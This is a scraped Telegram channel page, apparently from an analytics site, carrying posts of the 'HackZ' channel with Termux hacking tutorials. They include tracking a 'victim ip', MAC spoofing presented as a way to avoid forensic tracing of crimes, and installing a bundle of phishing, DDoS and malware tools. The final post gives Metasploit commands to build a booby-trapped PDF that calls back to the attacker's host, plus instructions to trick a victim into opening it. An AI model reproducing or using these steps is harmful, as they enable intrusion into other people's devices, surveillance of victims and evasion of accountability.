cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

HackZ

Mostrar más
El país no está especificadoInglés56 887Tecnologías y Aplicaciones8 855
Publicaciones publicitarias
2 013
Suscriptores
Sin datos24 horas
-207 días
-11330 días

Carga de datos en curso...

Tasa de crecimiento de suscriptores

Carga de datos en curso...

Join this chnnl 👉🏿 De General 👈🏿
Mostrar todo...
Track Location With Live Address And City in Termux IpHack: is a tracking tool for both IP location and tracking testing. Installation apt update && apt upgrade apt install git git clone https://github.com/mishakorzik/IpHack cd IpHack bash setup.sh chmod +x * cd IpHack python IpHack.py -t (victim ip) Done
Mostrar todo...
MAC ADDRESS SPOOFING BY MRKING A What Is MAC Address Spoofing And Spoofing Tutorial MAC Address Today we learn about MAC address and it’s spoofing. What is MAC address and MAC address spoofing, How to do MAC address spoofing? We learn all these concepts step by step. Firstly, I will tell you what is MAC address. So, MAC address (Media Access Control Address), is an address which is given to all devices which are connected to the internet. It is also known as a permanent physical address. It is 48-bit code 6 hex pair code. Commonly, you see it on the back side of your router, modem etc. It’s first 3 octet shows OUI (Organization Unique Identity) the information of the company in which the device is created and the last 3 octet shows us the NIC (Network Interface Controller) This shows us the working of the device for which purpose it is built. This address is like IP address but the difference on both is that: We can change IP address but we can’t change MAC address easily till it changes manually. With the help of MAC address, any device location is trackable. So, If you do any crime then computer forensic team easily track you because you’re all surfing logs are automatically saved to your internet service provider and from there forensic team will see all the data, from which router the crime takes place. MAC Address Spoofing That’s why all the Black Hat Hackers change their MAC address and IP address also, to keep their identity hidden from the internet. This process of changing MAC address is known as MAC address spoofing. Don’t worry changing of MAC address is not illegal but the illegal work you do after changing MAC address remains illegal. So, let’s see how can we change MAC address of a system. Lets Start: Open your terminal and type ifconfig to see your default MAC address. So, here I show you changing my eth0 MAC address. Simply, type ifconfig eth0 down and then type ifconfig eth0 hw ether aa:bb:cc:dd:ee:ff  and then type ifconfig eth0 up Enjoy, now your MAC address is change and you can see your new mac address which you gave above by typing ifconfig eth0 Another Way to change MAC address type macchanger -s wlan0 . This will show you your available MAC address. Then type ifconfig wlan0 down to stop your wireless interface. Then type macchanger -m ‘new mac address’ wlan0 . This will change your MAC address to the given MAC address. Now, type ifconfig wlan0 up to start your wireless interface BOOM! Your MAC address again changes you see your new MAC address by typing macchanger -s wlan0 .
Mostrar todo...
Photo unavailable
HackZ: 🔴 INSTALL DH-ALL IN TERMUX 🔴 👉 This is a package of all hacking tools., This tool contain over 300+ Advance and professional Hacking tools it contain Phishing, Brute forcing, cloning, Vulnerability scanning, Information Gathering, Tracing and Tracking, Exploitation, Password cracking, Wifi Hacking, Bombing, DDOS, Malwares, Some special pakages and Another Hacking tools ✅ Installation • apt update && apt upgrade -y pkg install python -y pkg install git -y git clone https://github.com/DH-AL/Dh-Allcd Dh-Allbash Dh-All.sh ✅ Done
Mostrar todo...
🔴 INSTALL DH-ALL IN TERMUX 🔴 👉 This is a package of all hacking tools., This tool contain over 300+ Advance and professional Hacking tools it contain Phishing, Brute forcing, cloning, Vulnerability scanning, Information Gathering, Tracing and Tracking, Exploitation, Password cracking, Wifi Hacking, Bombing, DDOS, Malwares, Some special pakages and Another Hacking tools ✅ Installation • apt update && apt upgrade -y pkg install python -y pkg install git -y git clone https://github.com/DH-AL/Dh-Allcd Dh-Allbash Dh-All.sh ✅ Done
Mostrar todo...
⬇️How to Bypass Mega Download Limit Using Megabasterd ⚙️ @TheStarkArmyX FOLLOW THE STEPS1] Download MegaBasterds Software: GitHub - https://github.com/tonikelope/megabasterd 2] Unzip the files 3] Copy the mega link of file you want to download. 4] Run the Mega Basterd Windows Batch file 5] Click on File option on the left corner and click on New Download 6] Paste the link and start downloading!! 7) Connect to different ip when stops downloading and try again
Mostrar todo...
HUMAN GENERATOR AI tool for creating fake photos of people with many options: - use uploaded face photo - age - gender - skin tone - etnicity - body type - pose - hair color - clothing style - background https://generated.photos/human-generator/
Mostrar todo...
⌨️ ANDROID PHONE IP UNLOCKER WITH TERMUX 🛡 IP Unblocker Is A Plugin That Works In Conjunction With Cpanel And Directadmin Servers Running The Software Firewall Csf And Lfd. Lfd Can Block Ip Addresses Of Users That Login Repeatedly With The Wrong Credentials. This Plugin Provides A Means For Clients To Unblock Your Own IP Address Should That Happen To Them. INSTALLING ON TERMUX 🔎 apt update && apt upgrade -y pkg install git pkg install python rm -rf IP-UNBLOCKER git clone --depth=1 https://github.com/U7P4L-IN/IP-UNBLOCKER.git cd IP-UNBLOCKER python3 IP.py Done
Mostrar todo...
Photo unavailable
This life has no balance
Mostrar todo...
👨‍💻HOW TO HACK ANY DEVICE VIA PDF👨‍💻 ♻️ Requirement ♻️ ▪️Termux ▪️Metasploit ✅ Note : Only for Educational Purpose Try on Your own Risk! ⌨️ LET'S START THE HACK ⌨️ ▪️Open termux and follow the commands mentioned below. First, make sure you have metaploit installed in it. $ msfconsole $ use exploit/windows/fileformat/ adobe_pdf_embed_exe_nojs $ setlhost (your IP) $ set lport (use any port) $ exploit ▪️Now you have the pdf in metasploit. Move PDF payload to your storage card. Follow the commands below. ls -la cd .msfs cd local mv (filename)/(move locations) Now you'll see PDF payload in the SDCard, just send it to the VICTIM and convince to open it. Then you need to start the session. STARTING THE SESSION Follow these commands: ▪️use exploit/multi/handler set lhost (IP) set lport (port) exploit ▪️Now you have access of the victim's phone, you can even bypass the OTP. This method is not 100% Accurate but it works for the most of the time!
Mostrar todo...